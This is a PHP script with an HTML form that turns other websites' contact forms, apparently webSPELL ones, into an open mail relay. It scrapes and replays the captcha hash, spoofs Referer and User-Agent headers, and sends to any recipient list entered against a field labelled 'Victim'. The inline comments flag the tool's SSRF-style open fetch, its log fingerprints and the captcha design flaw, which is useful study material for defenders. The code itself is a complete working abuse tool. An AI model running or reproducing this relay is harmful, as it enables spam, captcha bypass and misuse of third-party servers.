* | Date: Tue, 13 Oct 2009 13:13:09 +0200 */

// Step of the relay flow, chosen by ?phase=N on the request to THIS script:
//   0 = only render the form below,
//   1 = fetch the target contact page and pull the captcha data out of it,
//   2 = submit the filled-in form to the target on the caller's behalf.
// intval() means any other value matches no case and the switch does nothing.
$phase = isset($_GET['phase']) ? intval($_GET['phase']) : 0x0;

switch($phase) {
    case 0x0:
        break;

    case 0x1:
        // The target URL is taken verbatim from the caller and handed to curl
        // with no validation, so this script is an open fetch proxy (SSRF-style)
        // for anyone who can reach it, including towards hosts on the relay's own
        // network.  When 'url' is absent $url is false; parse_url(false) then
        // yields no scheme/host and the $base_url concatenation below emits notices.
        $url = isset($_POST['url']) ? $_POST['url'] : false;
        $info = parse_url($url);
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, false);
        // Browser-looking request headers.  Note the first entry has ';' rather
        // than ':' after "User-Agent", so it is not a well-formed header line.
        // For defenders: this fixed, dated UA string together with the malformed
        // line is a stable fingerprint of this tool in access logs.
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'User-Agent; Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
            'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3',
            'Accept-Encoding: gzip,deflate',
            'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
            'Keep-Alive: 300',
            'Connection: keep-alive',
        ));
        $content = curl_exec($ch);
        curl_close($ch);
        // Directory part of the target path: everything before the last '/'.
        if(isset($info['path'])) {
            $path = substr($info['path'], 0, strrpos($info['path'], '/'));
        } else {
            $path = '';
        }
        // Base of the target site; presumably used by the HTML below to resolve
        // the captcha image relative to the target — the template is not visible here.
        $base_url = $info['scheme'] . '://' . $info['host'] . $path;
        if($content !== false) {
            // The captcha token is recovered from the first "<32 alphanumerics>.jpg"
            // reference in the page body.  Response headers are excluded
            // (CURLOPT_HEADER false) so a session id in Set-Cookie cannot match.
            // Lesson for the target side: a captcha whose server-side token is
            // exposed in the image filename and accepted back in a form field
            // gives no protection against a relaying client.
            $hash_matches = array();
            preg_match('/([a-zA-Z0-9]{32})\.jpg/', $content, $hash_matches);
            if(!empty($hash_matches)) {
                // current() is the full match ("<hash>.jpg"); drop the 4-char ".jpg".
                $hash = substr(current($hash_matches), 0, -4);
            } else {
                // $hash is left undefined in this branch; execution continues.
                trigger_error('doesnt look like an contact page');
            }
            // Some targets render the challenge as a plain 5-digit number in a
            // table cell instead of an image.  In that case the "captcha" is no
            // barrier at all and both fields are prefilled straight from the page.
            $captcha_matches = array();
            preg_match('/([0-9]{5})<\/td>/', $content, $captcha_matches);
            if(!empty($captcha_matches)) {
                // Full match is "12345</td>"; strip_tags() removes the closing tag.
                $quest = strip_tags(current($captcha_matches));
                $captcha = strip_tags(current($captcha_matches));
            } else {
                // Original author's assumption: an image captcha at tmp/[hash].jpg
                // on the target, to be read and typed in by the caller.
                $quest = '';
                $captcha = '';
            }
        } else {
            // $ch was already closed above, so this reads the error from a closed
            // handle and may not report the real curl failure.
            echo curl_error($ch);
            exit;
        }
        break;

    case 0x2:
        // Form fields forwarded to the target.  Every value is read from $_POST
        // without isset(), so a missing key raises a PHP notice/warning.
        // 'getemail' is the recipient address and is supplied by the caller, not
        // by the target's page — this is the risk the page footnote alludes to:
        // a contact form that trusts a client-supplied recipient is an open
        // mail relay.
        $fields = array(
            'action' => 'send',
            'getemail' => $_POST['getemail'],
            'name' => $_POST['name'],
            'from' => $_POST['from'],
            'subject' => $_POST['subject'],
            'captcha' => $_POST['captcha'],
            'captcha_hash' => $_POST['captcha_hash'],
            // Normalise CRLF/CR to LF, then hard-wrap at 70 columns.
            'text' => wordwrap(str_replace(array("\r\n", "\r"), "\n", $_POST['text']), 70),
        );
        // Hand-built application/x-www-form-urlencoded body (urlencode per value,
        // joined with '&').
        $post = array();
        foreach($fields as $k => $v) {
            $post[] = $k . '=' . urlencode($v);
        }
        $postfields = implode('&', $post);
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $_POST['url']);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields);
        curl_setopt($ch, CURLOPT_HEADER, true);
        // Referer is set to the target's own URL.  For defenders: this is why a
        // Referer check on its own does not stop scripted form submission — the
        // header is entirely client-controlled.  The Cookie line is commented out.
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'Referer: ' . $_POST['url'],
            //'Cookie: ' . $_POST['cookie'],
        ));
        // CURLOPT_RETURNTRANSFER is not set here, so curl_exec() echoes the
        // response; it is captured through output buffering instead.  Because
        // CURLOPT_HEADER is true, $content includes the response headers.
        ob_start();
        curl_exec($ch);
        curl_close($ch);
        $content = ob_get_contents();
        ob_end_clean();
        // Not used anywhere in the visible code.
        $matches = array();
        // "Success" is inferred by a byte-wise substring search for one of the
        // target's localised "message sent" strings.  Several entries appear
        // mis-encoded (e.g. 'succčs', 'č', 'framgĺngsrikt') and may never match a
        // UTF-8 page, so this is a heuristic only — as the footnote under the
        // form states.
        $success_msgs = array(
            'Tvoje zpráva byla úspešne odeslána',
            'Deine Nachricht wurde erfolgreich versandt',
            'Din besked blev sent',
            'Su noticia era expedida',
            'Votre message a été envoyé avec succčs',
            'Vaša poruka je uspješno poslana',
            'Az üzenetedet sikeresen elküldted',
            'Il tuo messaggio č stato inviato con successo',
            'Jusu žinute buvo sekmingai išsiusta',
            'Je bericht is succesvol verzonden',
            'Your message was send successfully',
            'Wiadomosc wyslana pomyslnie',
            'A sua mensagem foi enviada com sucesso',
            'Ditt meddlande blev framgĺngsrikt skickat',
            'Vaša správa bola odoslaná',
        );
        $success = false;
        foreach($success_msgs as $msg) {
            if(strpos($content, $msg) !== false) {
                $success = true;
                break;
            }
        }
        break;
}
?>
The URL of the contact form that you want to use to send an email
Example: http://www.webspell.org/index.php?site=contact
Victim:
As receiver you can enter any email you like, or a comma separated list of emails
Receiver:
Name:
From:
Subject:
Challenge:
Captcha:
Captcha hash:
Text:
Success*:
Response:
* The success is based on the success message of the victim's page. If the success is false you could analyze the HTML code to find the reason.